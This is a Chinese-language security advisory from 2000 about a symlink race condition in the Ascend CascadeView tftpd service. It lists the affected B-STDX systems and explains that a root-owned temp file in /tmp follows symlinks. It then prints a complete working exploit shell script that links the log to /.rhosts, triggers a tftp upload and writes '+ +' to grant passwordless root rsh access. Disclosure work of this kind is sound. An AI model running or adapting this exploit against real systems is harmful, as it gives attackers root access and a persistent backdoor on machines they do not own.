Ascend CascadeView tftpd链接漏洞发布时间:2000-05-03 更新时间:2000-05-03 严重程度:高 威胁程度:普通用户访问权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 Ascend CascadeView/UX 1.0\Ascend B-STDX 9000 1.0\Ascend B-STDX 8000 1.0详细描述 Ascend CascadeView tftpd在/tmp下建立了一个叫tftpd_xfer_status.log的临时文件,如果/tmp/tftpd_xfer_status.log是一个已经存在的链接的话,它将以root权限更改链接指向的文件,入侵者可以利用它来那立诸如/.rhosts之类的文件。 测试代码 下面是它的利用代码: #!/bin/sh # # tftpserv.sh - Loneguard 07/03/99 # # Buggy tftp server shipped with CascadeView B-STDX 8000/9000 # rm /tmp/tftpd_xfer_status.log ln -s /.rhosts /tmp/tftpd_xfer_status.log echo KungFu > crazymonkey ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1 echo "+ +" > /.rhosts 解决方案 尚无 相关信息 |
